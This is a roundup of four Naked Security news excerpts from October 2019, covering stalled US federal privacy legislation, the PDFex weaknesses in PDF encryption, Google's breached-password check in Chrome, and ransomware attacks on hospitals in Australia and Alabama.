No federal privacy law will make it in the US this year, sources say

By Lisa Vaas

You know about that one, much-hemmed-and-hawed-over, GDPR-ish, national, US privacy law? The one we don’t have? The lack of which means the country’s data privacy landscape is made up of a crazy quilt of state laws?

Not happening. Not this year.

In spite of the US Federal Trade Commission (FTC) marching down to Capitol Hill to beat the drum for a unified federal privacy law (and more regulatory powers to enforce it), and in spite of both the House and Senate holding hearings on privacy legislation, transparency about how data is collected and shared, and the stiffening of penalties for data-handling violations, the US is not likely to see an online privacy bill come before Congress this year.

That’s according to Reuters’ anonymous sources, who say that lawmakers haven’t managed to agree on issues such as whether the bill would preempt state rules.

And when we’re talking about state rules, we’re talking about the elephant in the room: California’s Consumer Privacy Act (CCPA), which goes into effect on 1 January 2020.

In lieu of a federal law – the one we’re not getting this year because nobody can agree on what it should do – the CCPA might turn into the ipso facto privacy rule of the land. Tech companies are terrified that it’s going to be strict, and it’s going to be expensive for all the companies that slurp up consumer data to track us, market at us and profit from selling our data …Or which screw up by fumbling that data, or which quietly pickpocket that data, as the case may be.

In hearings over possible privacy legislation – which neither you nor I have been invited to, fellow citizen, though tech companies have – lawmakers and online advertising representatives have grumbled about tough laws such as the CCPA and the EU’s General Data Protection Regulation (GDPR), saying that such strict laws could lead to businesses being swamped by fines and compliance costs, and that consumers have been buried in a blizzard of required notices and privacy policies they don’t bother to read.

Read more at https://nakedsecurity.sophos.com/2019/10/03/no-federal-privacy-law-will-make-it-in-the-us-this-year-sources-say/

PDF encryption standard weaknesses uncovered

By John E Dunn

You would be forgiven for thinking that encrypting PDFs, before they are stored or sent via email, keeps their contents away from prying eyes.

But according to researchers in Germany, it might be time to revisit that assumption after they discovered weaknesses in PDF encryption which could be exploited to reveal the contents of a file to an attacker.

Dubbed ‘PDFex’ (PDF exfiltration), the weaknesses documented in Practical Decryption exFiltration: Breaking PDF Encryption by researchers from Ruhr University Bochum and the Münster University of Applied Sciences, offer two attack methods, each with three variants that depend on which PDF viewer is used to open a target document.

Attack #1 – direct exfiltration

The PDF standard ships with native AES symmetric encryption which secures documents using a password communicated to the recipient (arguably a weakness in itself) or, in some installations, through public key encryption.

However, the researchers quickly discovered a hole in this method, so glaringly obvious that it’s surprising nobody’s noticed it before. The PDF standard allows for partially encrypted documents that include a mix of both encrypted and unencrypted sections, and does not include integrity checking. This means an attacker can add additional sections or interactive Actions to an encrypted PDF without raising any alarms, said the researchers in their overview:

The most relevant object for the attack is the definition of an Action, which can submit a form, invoke a URL, or execute JavaScript.

Actions can be set to run when a document is opened or something within the document is clicked on, and send the decrypted contents to an attacker’s server.

Read more at https://nakedsecurity.sophos.com/2019/10/03/pdf-encryption-standard-weaknesses-uncovered/

Google’s Password Manager now checks for breached credentials

By Danny Bradbury

Google has taken the next step in its strategy to secure users’ passwords. The search giant has taken a password-checking feature released early this year as an extension to its Chrome browser and embedded it directly into its password manager service.

In February, the search and advertising giant released Password Checkup, a Chrome extension that checks passwords to see if they are secure. When users enter a username and password, the extension checks a hashed version of the credentials against Google’s internal database of four billion unsafe logins. If the extension finds a match, it will warn the user and suggest that they reset their password.

Now, the company has decided to integrate this feature directly into its password manager, which is the feature in Chrome that asks if you want to save the login credentials for online services and reuse them later.

Read more at https://nakedsecurity.sophos.com/2019/10/03/googles-password-manager-now-checks-for-breached-credentials/

Ransomware attacks paralyze, and sometimes crush, hospitals

By Lisa Vaas

Major hospitals and some health clinics in the US and Australia have been crippled in new ransomware attacks, forcing some into emergency manual mode and one to close permanently due to extensive loss of patient healthcare records encrypted by data kidnappers.

In Australia, the toll is seven hospitals. According to an advisory issued on Tuesday by Victoria’s Department of Premier and Cabinet, a ransomware attack discovered on Monday has blocked access to several key systems, including financial management.

The hospitals and health services, which are located in Gippsland and south-west Victoria, have isolated a number of systems, taking them offline so as to quarantine the infection.

Isolating the systems has led to the shutdown of some patient record, booking and management systems, which may affect patient contact and scheduling. Where practical, some of the hospitals are reverting to manual systems to maintain patient services.

Loss of access to patient histories, charts, images and other information has forced the hospitals to rework bookings and scheduling so as to minimize disruption of service.

Meanwhile, in the US, three medical centers in western Alabama said this week that they’re not taking new patients due to a ransomware attack. According to a press release put out on Tuesday, elective procedures and surgeries scheduled for the next day – Wednesday, 2 October – would be going ahead as planned, with the centers running on “downtime” procedures that they say enable them to provide “safe and effective care” for those patients.

Current patients are staying put: they’re not being transferred to other medical centers. New admissions for critical cases are being diverted to other facilities, however. As for tests and other procedures, patients are being advised to call before they show up.

Read more at https://nakedsecurity.sophos.com/2019/10/03/ransomware-attacks-paralyze-and-sometimes-crush-hospitals/